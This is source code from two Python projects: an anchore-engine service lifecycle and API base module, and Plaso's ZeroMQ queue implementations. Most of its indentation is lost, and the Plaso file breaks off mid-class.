def register_handler(self, stage, handler_fn, handler_args=None):
"""
Register handlers for specific lifecycle stages
:param stage: LifeCycleState enum obj to register for
:param handler_fn: function to invoke
:param handler_args: list of arguments to pass to the handler in order handler_fn(*handler_args)
:return:
"""
assert isinstance(stage, LifeCycleStages)
if stage in self.lifecycle_handlers:
self.lifecycle_handlers[stage].append((handler_fn, handler_args))
else:
raise KeyError(stage)
def _get_service_configuration(self, global_config):
"""
Extract service config from the global config.
Override or supplement this function if a service needs configuration that isn't strictly in its 'service' entry.
Should be a very rare occurrence.
:param global_config:
:return: service configuration for this service
"""
assert(self.__service_name__ in global_config['services'])
return global_config['services'][self.__service_name__]
def configure(self):
self._process_stage_handlers(LifeCycleStages.pre_config)
self._configure()
self._process_stage_handlers(LifeCycleStages.post_config)
def _configure(self):
"""
Load service configuration
:return:
"""
logger.info('Loading and initializing global configuration')
self.configuration = self._get_service_configuration(self.global_configuration)
self.instance_id = localconfig.get_host_id()
self.fq_name = (self.name, self.instance_id)
# get versions of things
try:
self.versions = localconfig.get_versions()
except Exception as err:
logger.error('cannot detect versions of service: exception - ' + str(err))
raise err
self.task_handlers_enabled = self.configuration.get('task_handlers_enabled', True)
env_setting = not os.environ.get('ANCHORE_ENGINE_DISABLE_MONITORS', 'false').lower() == 'true'
self.task_handlers_enabled = self.task_handlers_enabled and env_setting
if not self.task_handlers_enabled:
if not env_setting:
logger.warn('Task handlers disabled by setting ANCHORE_ENGINE_DISABLE_MONITORS in environment')
else:
logger.warn('Task handlers disabled by configuration file value')
try:
kick_timer = int(self.configuration['cycle_timer_seconds'])
except:
kick_timer = 1
try:
cycle_timers = {}
cycle_timers.update(self.configuration['cycle_timers'])
except:
cycle_timers = {}
self.monitor_kwargs['kick_timer'] = kick_timer
self.monitor_kwargs['cycle_timers'] = cycle_timers
self.monitor_kwargs['monitors'] = copy.deepcopy(self.__monitors__)
self.monitor_kwargs['monitor_threads'] = self.monitor_threads
self.monitor_kwargs['servicename'] = self.name
logger.info('Configuration complete')
def db_connect(self):
self._process_stage_handlers(LifeCycleStages.pre_db)
self._db_connect()
self._process_stage_handlers(LifeCycleStages.post_db)
def _db_connect(self):
"""
Initialize the db connection and prepare the db
:return:
"""
logger.info('Configuring db connection')
if not self.requires_db:
logger.info('DB Connection disabled in configuration for service {}. Skipping db init'.format(self.__service_name__))
return True
logger.info('Initializing database')
# connect to DB
try:
initialize_db(localconfig=self.global_configuration, versions=self.versions)
except Exception as err:
logger.error('cannot connect to configured DB: exception - ' + str(err))
raise err
logger.info('DB connection initialization complete')
def credential_init(self):
self._process_stage_handlers(LifeCycleStages.pre_credentials)
self._credential_init()
self._process_stage_handlers(LifeCycleStages.post_credentials)
def _credential_init(self):
logger.info('Bootstrapping credentials')
# credential bootstrap
self.global_configuration['system_user_auth'] = (None, None)
if self.require_system_user:
gotauth = False
max_retries = 60
self.global_configuration['system_user_auth'] = (None, None)
for count in range(1, max_retries):
try:
with session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
logger.info('Checking system creds')
c = mgr.get_system_credentials()
if c is not None:
logger.info('Found valid system creds')
gotauth = True
break
else:
logger.info('Did not find valid system creds')
logger.error('cannot get system user auth credentials yet, retrying (' + str(count) + ' / ' + str(max_retries) + ')')
time.sleep(5)
except InvalidOauthConfigurationError:
raise
except Exception as err:
logger.exception('cannot get system-user auth credentials - service may not have system level access')
self.global_configuration['system_user_auth'] = (None, None)
gotauth = False
if not gotauth:
raise Exception('service requires system user auth to start')
logger.info('Credential initialization complete')
def bootstrap(self):
self._process_stage_handlers(LifeCycleStages.pre_bootstrap)
self._bootstrap()
self._process_stage_handlers(LifeCycleStages.post_bootstrap)
def _bootstrap(self):
"""
Create and init the service
:return:
"""
# Do monitor-thread bootstraps here
logger.info('Bootstrapping service')
logger.info('Service bootstrap complete')
return True
def register(self):
self._process_stage_handlers(LifeCycleStages.pre_register)
self._register()
self._process_stage_handlers(LifeCycleStages.post_register)
def _register(self):
if not self.is_enabled:
logger.error('Service not enabled in config, not registering service: ' + self.name)
raise Exception('No service enabled, cannot continue bootstrap')
logger.info('Registering service: {}'.format(self.name))
service_template = {
'type': 'anchore',
'base_url': 'N/A',
'status_base_url': 'N/A',
'version': 'v1',
'short_description': ''
}
hstring = 'http'
if 'external_tls' in self.configuration:
if self.configuration.get('external_tls', False):
hstring = 'https'
elif 'ssl_enable' in self.configuration:
if self.configuration.get('ssl_enable', False):
hstring = 'https'
endpoint_hostname = endpoint_port = endpoint_hostport = None
if self.configuration.get('external_hostname', False):
endpoint_hostname = self.configuration.get('external_hostname')
elif self.configuration.get('endpoint_hostname', False):
endpoint_hostname = self.configuration.get('endpoint_hostname')
if self.configuration.get('external_port', False):
endpoint_port = int(self.configuration.get('external_port'))
elif self.configuration.get('port', False):
endpoint_port = int(self.configuration.get('port'))
if endpoint_hostname:
endpoint_hostport = endpoint_hostname
if endpoint_port:
endpoint_hostport = endpoint_hostport + ":" + str(endpoint_port)
if endpoint_hostport:
service_template['base_url'] = "{}://{}".format(hstring, endpoint_hostport)
else:
raise Exception("could not construct service base_url - please check service configuration for hostname/port settings")
try:
service_template['status'] = False
service_template['status_message'] = taskstate.base_state('service_status')
with session_scope() as dbsession:
service_records = db_services.get_byname(self.__service_name__, session=dbsession)
# fail if trying to add a service that must be unique in the system, but one already is registered in DB
if self.__is_unique_service__:
if len(service_records) > 1:
raise Exception('more than one entry for service type (' + str(
self.__service_name__) + ') exists in DB, but service must be unique - manual DB intervention required')
for service_record in service_records:
if service_record and (service_record['hostid'] != self.instance_id):
raise Exception('service type (' + str(self.__service_name__) + ') already exists in system with different host_id - detail: my_host_id=' + str(
self.instance_id) + ' db_host_id=' + str(service_record['hostid']))
# if all checks out, then add/update the registration
ret = db_services.add(self.instance_id, self.__service_name__, service_template, session=dbsession)
try:
my_service_record = {
'hostid': self.instance_id,
'servicename': self.__service_name__,
}
my_service_record.update(service_template)
servicestatus.set_my_service_record(my_service_record)
self.service_record = my_service_record
except Exception as err:
logger.warn('could not set local service information - exception: {}'.format(str(err)))
except Exception as err:
raise err
service_record = servicestatus.get_my_service_record()
servicestatus.set_status(service_record, up=True, available=True, update_db=True)
logger.info('Service registration complete')
return True
def initialize(self, global_configuration, db_connect=True, require_system_user_auth=None):
"""
Service initialization that requires the service config loaded and available but before registration of the service
or db connection and access to service discovery.
:param global_configuration: dict of configuration data to use
:param db_connect: override the __db_enabled__ class variable just for this instance. If False, no db init or connect is performed on bootstrap
:param require_system_user_auth: optional override of the __require_system_user__ class variable for this instance
:return: True on success
"""
self.global_configuration = global_configuration
self.requires_db = db_connect
if require_system_user_auth is not None:
self.require_system_user = require_system_user_auth
logger.debug('Invoking instance-specific handler registration')
self._register_instance_handlers()
self.configure()
self.db_connect()
self.credential_init()
self.bootstrap()
self.register()
return True
def get_monitor_thread(self, monitor_thread_wrapper=None):
"""
Start the service and return a thread to execute the monitor. Caller must actually start the monitor thread for this service.
:param monitor_thread_wrapper: function that takes the target function and **kwargs as arguments and returns an object expected by the caller
:return:
"""
if self.task_handlers_enabled:
if monitor_thread_wrapper:
t = monitor_thread_wrapper(self.monitor_fn, **self.monitor_kwargs)
else:
t = threading.Thread(target=self.monitor_fn, kwargs=self.monitor_kwargs)
return t
else:
return None
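# --- Hypothetical usage sketch (not part of the original module) ---
# Illustrates the bootstrap order documented on BaseService (configure -> db_connect ->
# credential_init -> bootstrap -> register, driven by initialize()) and per-stage handler
# registration. The service name, handler, and configuration expectations below are
# invented for illustration; a real deployment supplies a full anchore-engine config.
def _example_bootstrap_sketch(global_config):
    class _ExampleService(BaseService):
        __service_name__ = 'example_service'
        __db_enabled__ = False
        __require_system_user__ = False
    def _announce_config_loaded():
        logger.info('example post_config handler invoked')
    svc = _ExampleService()
    svc.register_handler(LifeCycleStages.post_config, _announce_config_loaded)
    # Assumes global_config['services']['example_service'] exists, is enabled, and has
    # endpoint_hostname/port values so _register() can construct a base_url.
    svc.initialize(global_config, db_connect=False, require_system_user_auth=False)
    return svc.get_monitor_thread()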
class ApiService(BaseService):
"""
A service that provides an api
"""
__spec_dir__ = 'swagger'
__spec_file__ = 'swagger.yaml'
__service_api_version__ = 'v1'
def __init__(self, options=None):
super().__init__(options=options)
self._api_application = None
self.yosai = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
logger.info('Registering api handlers')
self.register_handler(LifeCycleStages.pre_bootstrap, self.initialize_api, None)
def _init_wsgi_app(self, service_name, api_spec_dir=None, api_spec_file=None):
"""
Return an initialized service with common api resource and auth config
:return:
"""
try:
self._application = connexion.FlaskApp(__name__, specification_dir=api_spec_dir)
flask_app = self._application.app
flask_app.url_map.strict_slashes = False
# Ensure jsonify() calls add whitespace for nice error responses
flask_app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True
# Suppress some verbose logs in dependencies
import logging as py_logging
py_logging.basicConfig(level=py_logging.ERROR)
# Initialize the authentication system
self.init_auth()
flask_app.before_request(self._inject_service)
flask_app.register_error_handler(AnchoreApiError, handle_api_exception)
metrics.init_flask_metrics(flask_app, servicename=service_name)
self._application.add_api(Path(api_spec_file), validate_responses=self.options.get('validate-responses'))
return self._application
except Exception as err:
traceback.print_exc()
raise err
def init_auth(self):
"""
Initializes the authentication subsystem as needed
:return:
"""
# Initialize the wrapper
init_authz_handler(configuration=self.configuration)
def _inject_service(self):
"""
Adds a reference to the service object into the request's app context
:return:
"""
g.service = self
def initialize_api(self):
"""
Initialize the api and return the wsgi application object
:return:
"""
logger.info('Initializing API from: {}/{}'.format(self.__spec_dir__, self.__spec_file__))
if self.configuration['listen'] and self.configuration['port'] and self.configuration['endpoint_hostname']:
if not self._api_application:
self._api_application = self._init_wsgi_app(self.__service_name__, self.__spec_dir__, self.__spec_file__)
def get_api_application(self):
if self._api_application is None:
raise Exception('API not initialized yet. Must initialize the service or call initialize_api() before the application is available')
return self._api_application.app
@staticmethod
def build_authz_heartbeat(service_name):
"""
Returns the handler function itself (uses a closure to pass some values in)
:return:
"""
def authz_heartbeat(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
logger.info('Checking authz availability')
try:
host_id = localconfig.get_host_id()
authz_handlr = get_authorizer()
handler = authz_handlr.__class__.__name__
ex = None
try:
result = authz_handlr.healthcheck()
except Exception as e:
ex = e
result = False
if not result:
fail_event = ServiceAuthzPluginHealthCheckFail(user_id=localconfig.ADMIN_ACCOUNT_NAME,
name=service_name,
host=host_id,
plugin=handler,
details=str(ex)
)
logger.info('Sending healthcheck failure event: {}'.format(fail_event.__event_type__))
try:
client = internal_client_for(CatalogClient, localconfig.ADMIN_ACCOUNT_NAME)
client.add_event(fail_event)
except Exception as ex:
logger.exception(
'Failure to send authz healthcheck failure event: {}'.format(fail_event.to_json()))
except Exception as e:
logger.exception('Caught unexpected exception from the authz heartbeat handler')
time.sleep(cycle_timer)
return True
return authz_heartbeat
class UserFacingApiService(ApiService):
def __init__(self, options=None):
super().__init__(options)
self._authz_actions = {}
self.api_spec = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.pre_bootstrap, self._process_api_spec, None)
@staticmethod
def parse_swagger(path):
with open(path) as f:
if path.endswith('yaml') or path.endswith('yml'):
return yaml.safe_load(f)
else:
return json.load(f)
@staticmethod
def build_action_map(swagger_content):
"""
Given a dict from the swagger spec (must be fully materialized, no external refs), determine the mapping
of an operation to an action using x-anchore-authz-action labels in the swagger.
This relies on using connexion such that the x-swagger-router-controller + operationId define the key as is implemented
in connexion. The resulting dict maps a fully-qualified function to an action
:param swagger_content: dict
:return: dict function_name -> action (e.g. anchore_engine.services.apiext.images.list_images -> listImages)
"""
action_map = {}
for path in swagger_content.get('paths').values():
for verb in path.values():
action = verb.get('x-anchore-authz-action')
controller = verb.get('x-swagger-router-controller')
operationId = verb.get('operationId')
action_map[controller + '.' + operationId] = action
return action_map
def _process_api_spec(self):
try:
self.api_spec = UserFacingApiService.parse_swagger(os.path.join(self.__spec_dir__, self.__spec_file__))
actions = UserFacingApiService.build_action_map(self.api_spec)
missing = [x for x in filter(lambda x: x[1] is None, actions.items())]
if missing:
raise Exception('API Spec validation error: All operations must have an x-anchore-authz-action label. Missing for: {}'.format(missing))
else:
self._authz_actions = actions
except Exception as ex:
logger.exception('Error loading swagger spec for authz action parsing. Cannot proceed')
raise ex
def action_for_operation(self, fq_operation_id):
"""
Raises KeyError if id not found
:param fq_operation_id:
:return:
"""
return self._authz_actions[fq_operation_id]
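# --- Hypothetical illustration (not part of the original module) ---
# Shows the mapping UserFacingApiService.build_action_map() derives from
# x-anchore-authz-action labels. Controller, operationId, and action names are invented.
_EXAMPLE_SWAGGER_FRAGMENT = {
    'paths': {
        '/images': {
            'get': {
                'x-swagger-router-controller': 'example.controllers.images',
                'operationId': 'list_images',
                'x-anchore-authz-action': 'listImages',
            }
        }
    }
}
# UserFacingApiService.build_action_map(_EXAMPLE_SWAGGER_FRAGMENT) would return:
# {'example.controllers.images.list_images': 'listImages'}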
|
zeromq_queue.py
|
# -*- coding: utf-8 -*-
"""ZeroMQ implementations of the Plaso queue interface."""
import abc
import errno
import threading
import time
# The 'Queue' module was renamed to 'queue' in Python 3
try:
import Queue # pylint: disable=import-error
except ImportError:
import queue as Queue # pylint: disable=import-error
import zmq
from plaso.engine import logger
from plaso.lib import errors
from plaso.multi_process import plaso_queue
# pylint: disable=no-member
class ZeroMQQueue(plaso_queue.Queue):
"""Interface for a ZeroMQ backed queue.
Attributes:
name (str): name to identify the queue.
port (int): TCP port that the queue is connected or bound to. If the queue
is not yet bound or connected to a port, this value will be None.
timeout_seconds (int): number of seconds that calls to PopItem and PushItem
may block for, before returning queue.QueueEmpty.
"""
_SOCKET_ADDRESS = 'tcp://127.0.0.1'
_SOCKET_TYPE = None
_ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS = 1500
_ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS = 1500
SOCKET_CONNECTION_BIND = 1
SOCKET_CONNECTION_CONNECT = 2
SOCKET_CONNECTION_TYPE = None
def __init__(
self, delay_open=True, linger_seconds=10, maximum_items=1000,
name='Unnamed', port=None, timeout_seconds=5):
"""Initializes a ZeroMQ backed queue.
Args:
delay_open (Optional[bool]): whether a ZeroMQ socket should be created
the first time the queue is pushed to or popped from, rather than at
queue object initialization. This is useful if a queue needs to be
passed to a child process from a parent process.
linger_seconds (Optional[int]): number of seconds that the underlying
ZeroMQ socket can remain open after the queue has been closed,
to allow queued items to be transferred to other ZeroMQ sockets.
maximum_items (Optional[int]): maximum number of items to queue on the
ZeroMQ socket. ZeroMQ refers to this value as "high water mark" or
"hwm". Note that this limit only applies at one "end" of the queue.
The default of 1000 is the ZeroMQ default value.
name (Optional[str]): Optional name to identify the queue.
port (Optional[int]): The TCP port to use for the queue. The default is
None, which indicates that the queue should choose a random port to
bind to.
timeout_seconds (Optional[int]): number of seconds that calls to PopItem
and PushItem may block for, before returning queue.QueueEmpty.
Raises:
ValueError: if the queue is configured to connect to an endpoint,
but no port is specified.
"""
if (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT
and not port):
raise ValueError('No port specified to connect to.')
super(ZeroMQQueue, self).__init__()
self._closed_event = None
self._high_water_mark = maximum_items
self._linger_seconds = linger_seconds
self._terminate_event = None
self._zmq_context = None
self._zmq_socket = None
self.name = name
self.port = port
self.timeout_seconds = timeout_seconds
if not delay_open:
self._CreateZMQSocket()
def _SendItem(self, zmq_socket, item, block=True):
"""Attempts to send an item to a ZeroMQ socket.
Args:
zmq_socket (zmq.Socket): used to send the item.
item (object): sent on the queue. Will be pickled prior to sending.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Returns:
bool: whether the item was sent successfully.
"""
try:
logger.debug('{0:s} sending item'.format(self.name))
if block:
zmq_socket.send_pyobj(item)
else:
zmq_socket.send_pyobj(item, zmq.DONTWAIT)
logger.debug('{0:s} sent item'.format(self.name))
return True
except zmq.error.Again:
logger.debug('{0:s} could not send an item'.format(self.name))
except zmq.error.ZMQError as exception:
if exception.errno == errno.EINTR:
logger.error(
'ZMQ syscall interrupted in {0:s}.'.format(
self.name))
return False
def _ReceiveItemOnActivity(self, zmq_socket):
"""Attempts to receive an item from a ZeroMQ socket.
Args:
zmq_socket (zmq.Socket): used to receive the item.
Returns:
object: item from the socket.
Raises:
QueueEmpty: if no item could be received within the timeout.
zmq.error.ZMQError: if an error occurs in ZeroMQ
"""
events = zmq_socket.poll(
self._ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS)
if events:
try:
received_object = self._zmq_socket.recv_pyobj()
return received_object
except zmq.error.Again:
logger.error(
'{0:s}. Failed to receive item in time.'.format(
self.name))
raise
except zmq.error.ZMQError as exception:
if exception.errno == errno.EINTR:
logger.error(
'ZMQ syscall interrupted in {0:s}. Queue aborting.'.format(
self.name))
raise
raise errors.QueueEmpty
def _SetSocketTimeouts(self):
"""Sets the timeouts for socket send and receive."""
# Note that timeout must be an integer value. If timeout is a float
# it appears that zmq will not enforce the timeout.
timeout = int(self.timeout_seconds * 1000)
receive_timeout = min(
self._ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS, timeout)
send_timeout = min(self._ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS, timeout)
self._zmq_socket.setsockopt(zmq.RCVTIMEO, receive_timeout)
self._zmq_socket.setsockopt(zmq.SNDTIMEO, send_timeout)
def _SetSocketHighWaterMark(self):
"""Sets the high water mark for the socket.
This number is the maximum number of items that will be queued in the socket
on this end of the queue.
"""
self._zmq_socket.hwm = self._high_water_mark
def _CreateZMQSocket(self):
"""Creates a ZeroMQ socket."""
logger.debug('Creating socket for {0:s}'.format(self.name))
if not self._zmq_context:
self._zmq_context = zmq.Context()
# The terminate and close threading events need to be created when the
# socket is opened. Threading events are unpickleable objects and cannot
# be passed in multiprocessing on Windows.
if not self._terminate_event:
self._terminate_event = threading.Event()
if not self._closed_event:
self._closed_event = threading.Event()
if self._zmq_socket:
logger.debug('Closing old socket for {0:s}'.format(self.name))
self._zmq_socket.close()
self._zmq_socket = None
self._zmq_socket = self._zmq_context.socket(self._SOCKET_TYPE)
self._SetSocketTimeouts()
self._SetSocketHighWaterMark()
if self.port:
address = '{0:s}:{1:d}'.format(self._SOCKET_ADDRESS, self.port)
if self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT:
self._zmq_socket.connect(address)
logger.debug('{0:s} connected to {1:s}'.format(self.name, address))
else:
self._zmq_socket.bind(address)
logger.debug(
'{0:s} bound to specified port {1:s}'.format(self.name, address))
else:
self.port = self._zmq_socket.bind_to_random_port(self._SOCKET_ADDRESS)
logger.debug(
'{0:s} bound to random port {1:d}'.format(self.name, self.port))
def Open(self):
"""Opens this queue, causing the creation of a ZeroMQ socket.
Raises:
QueueAlreadyStarted: if the queue is already started, and a socket already
exists.
"""
if self._zmq_socket:
raise errors.QueueAlreadyStarted()
self._CreateZMQSocket()
def Close(self, abort=False):
"""Closes the queue.
Args:
abort (Optional[bool]): whether the Close is the result of an abort
condition. If True, queue contents may be lost.
Raises:
QueueAlreadyClosed: if the queue is not started, or has already been
closed.
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
if not abort and self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
self._closed_event.set()
if abort:
if not self._closed_event.is_set():
logger.warning(
'{0:s} queue aborting. Contents may be lost.'.format(self.name))
self._linger_seconds = 0
# We can't determine whether there might be an operation being performed
# on the socket in a separate method or thread, so we'll signal that any
# such operation should cease.
self._terminate_event.set()
else:
logger.debug(
'{0:s} queue closing, will linger for up to {1:d} seconds'.format(
self.name, self._linger_seconds))
def IsBound(self):
"""Checks if the queue is bound to a port."""
return (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_BIND and
self.port is not None)
def IsConnected(self):
"""Checks if the queue is connected to a port."""
return (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT and
self.port is not None)
def IsEmpty(self):
"""Checks if the queue is empty.
ZeroMQ queues don't have a concept of "empty" - there could always be
messages on the queue that a producer or consumer is unaware of. Thus,
the queue is never empty, so we return False. Note that it is possible that
a queue is unable to pop an item from a queue within a timeout, which will
cause PopItem to raise a QueueEmpty exception, but this is a different
condition.
Returns:
bool: False, to indicate that the queue isn't empty.
"""
return False
@abc.abstractmethod
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
QueueAlreadyClosed: if the queue is closed.
"""
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def PopItem(self):
"""Pops an item off the queue.
Returns:
object: item from the queue.
Raises:
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
"""
class ZeroMQPullQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ PULL sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to
push.
"""
_SOCKET_TYPE = zmq.PULL
def PopItem(self):
"""Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first
time this method is called.
Returns:
object: item from the queue.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
popping an item.
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
RuntimeError: if closed or terminate event is missing.
zmq.error.ZMQError: if a ZeroMQ error occurs.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
logger.debug(
'Pop on {0:s} queue, port {1:d}'.format(self.name, self.port))
last_retry_timestamp = time.time() + self.timeout_seconds
while not self._closed_event.is_set() or not self._terminate_event.is_set():
try:
return self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
if time.time() > last_retry_timestamp:
raise
except KeyboardInterrupt:
self.Close(abort=True)
raise
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Provided for compatibility with the API, but doesn't actually work.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
WrongQueueType: as pushing items is not supported by this queue.
"""
raise errors.WrongQueueType()
class ZeroMQPullConnectQueue(ZeroMQPullQueue):
"""A Plaso queue backed by a ZeroMQ PULL socket that connects to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_CONNECT
class ZeroMQPushQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ PUSH sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to push items, not to
pop.
"""
_SOCKET_TYPE = zmq.PUSH
def PopItem(self):
"""Pops an item of the queue.
Provided for compatibility with the API, but doesn't actually work.
Raises:
WrongQueueType: as popping items is not supported by this queue.
"""
raise errors.WrongQueueType()
def PushItem(self, item, block=True):
"""Push an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time
this method is called.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
pushing an item.
QueueFull: if it was not possible to push the item to the queue
within the timeout.
RuntimeError: if terminate event is missing.
zmq.error.ZMQError: if a ZeroMQ specific error occurs.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._terminate_event:
raise RuntimeError('Missing terminate event.')
logger.debug(
'Push on {0:s} queue, port {1:d}'.format(self.name, self.port))
last_retry_timestamp = time.time() + self.timeout_seconds
while not self._terminate_event.is_set():
try:
send_successful = self._SendItem(self._zmq_socket, item, block)
if send_successful:
break
if time.time() > last_retry_timestamp:
logger.error('{0:s} unable to push item, raising.'.format(
self.name))
raise errors.QueueFull
except KeyboardInterrupt:
self.Close(abort=True)
raise
class ZeroMQPushBindQueue(ZeroMQPushQueue):
"""A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port.
This queue may only be used to push items, not to pop.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_BIND
class ZeroMQRequestQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ REQ sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to
push.
"""
_SOCKET_TYPE = zmq.REQ
def PopItem(self):
"""Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first
time this method is called.
Returns:
object: item from the queue.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
popping an item.
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
RuntimeError: if terminate event is missing.
zmq.error.ZMQError: if an error occurs in ZeroMQ.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._terminate_event:
raise RuntimeError('Missing terminate event.')
logger.debug('Pop on {0:s} queue, port {1:d}'.format(
self.name, self.port))
last_retry_time = time.time() + self.timeout_seconds
while not self._terminate_event.is_set():
try:
self._zmq_socket.send_pyobj(None)
break
except zmq.error.Again:
# The existing socket is now out of sync, so we need to open a new one.
self._CreateZMQSocket()
if time.time() > last_retry_time:
logger.warning('{0:s} timeout requesting item'.format(self.name))
raise errors.QueueEmpty
continue
while not self._terminate_event.is_set():
try:
return self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
continue
except KeyboardInterrupt:
self.Close(abort=True)
raise
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Provided for compatibility with the API, but doesn't actually work.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
WrongQueueType: as pushing items is not supported by this queue.
"""
raise errors.WrongQueueType()
class ZeroMQRequestConnectQueue(ZeroMQRequestQueue):
"""A Plaso queue backed by a ZeroMQ REQ socket that connects to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_CONNECT
class ZeroMQBufferedQueue(ZeroMQQueue):
"""Parent class for buffered Plaso queues.
Buffered queues use a regular Python queue to store items that are pushed or
popped from the queue without blocking on underlying ZeroMQ operations.
This class should not be instantiated directly, a subclass should be
instantiated instead.
"""
def __init__(
self, buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True,
linger_seconds=10, maximum_items=1000, name='Unnamed', port=None,
timeout_seconds=5):
"""Initializes a buffered, ZeroMQ backed queue.
Args:
buffer_max_size (Optional[int]): maximum number of items to store in
the buffer, before or after they are sent/received via ZeroMQ.
buffer_timeout_seconds(Optional[int]): number of seconds to wait when
doing a put or get to/from the internal buffer.
delay_open (Optional[bool]): whether a ZeroMQ socket should be created
the first time the queue is pushed to or popped from, rather than at
queue object initialization. This is useful if a queue needs to be
passed to a child process from a parent process.
linger_seconds (Optional[int]): number of seconds that the underlying
ZeroMQ socket can remain open after the queue object has been closed,
to allow queued items to be transferred to other ZeroMQ sockets.
maximum_items (Optional[int]): maximum number of items to queue on the
ZeroMQ socket. ZeroMQ refers to this value as "high water mark" or
"hwm". Note that this limit only applies at one "end" of the queue.
The default of 1000 is the ZeroMQ default value.
name (Optional[str]): name to identify the queue.
port (Optional[int]): The TCP port to use for the queue. None indicates
that the queue should choose a random port to bind to.
timeout_seconds (Optional[int]): number of seconds that calls to PopItem
and PushItem may block for, before returning queue.QueueEmpty.
"""
self._buffer_timeout_seconds = buffer_timeout_seconds
self._queue = Queue.Queue(maxsize=buffer_max_size)
self._zmq_thread = None
# We need to set up the internal buffer queue before we call super, so that
# if the call to super opens the ZMQSocket, the backing thread will work.
super(ZeroMQBufferedQueue, self).__init__(
delay_open=delay_open, linger_seconds=linger_seconds,
maximum_items=maximum_items, name=name, port=port,
timeout_seconds=timeout_seconds)
def _CreateZMQSocket(self):
"""Creates a ZeroMQ socket as well as a regular queue and a thread."""
super(ZeroMQBufferedQueue, self)._CreateZMQSocket()
if not self._zmq_thread:
thread_name = '{0:s}_zmq_responder'.format(self.name)
self._zmq_thread = threading.Thread(
target=self._ZeroMQResponder, args=[self._queue], name=thread_name)
self._zmq_thread.start()
@abc.abstractmethod
def _ZeroMQResponder(self, source_queue):
"""Listens for requests and replies to clients.
Args:
source_queue (Queue.queue): queue to pull items from.
"""
def Close(self, abort=False):
"""Closes the queue.
Args:
abort (Optional[bool]): whether the Close is the result of an abort
condition. If True, queue contents may be lost.
Raises:
QueueAlreadyClosed: if the queue is not started, or has already been
closed.
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
if not abort and self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
self._closed_event.set()
if abort:
if not self._closed_event.is_set():
logger.warning(
'{0:s} queue aborting. Contents may be lost.'.format(self.name))
# We can't determine whether there might be an operation being performed
# on the socket in a separate method or thread, so we'll signal that any
# such operation should cease.
self._terminate_event.set()
self._linger_seconds = 0
if self._zmq_thread:
logger.debug('[{0:s}] Waiting for thread to exit.'.format(self.name))
self._zmq_thread.join(timeout=self.timeout_seconds)
if self._zmq_thread.is_alive():
logger.error((
'{0:s} ZMQ responder thread did not exit within timeout').format(
self.name))
else:
logger.debug(
'{0:s} queue closing, will linger for up to {1:d} seconds'.format(
self.name, self._linger_seconds))
def Empty(self):
"""Removes all items from the internal buffer."""
try:
while True:
self._queue.get(False)
except Queue.Empty:
pass
class ZeroMQBufferedReplyQueue(ZeroMQBufferedQueue):
"""Parent class for buffered Plaso queues backed by ZeroMQ REP sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to push items, not to
pop.
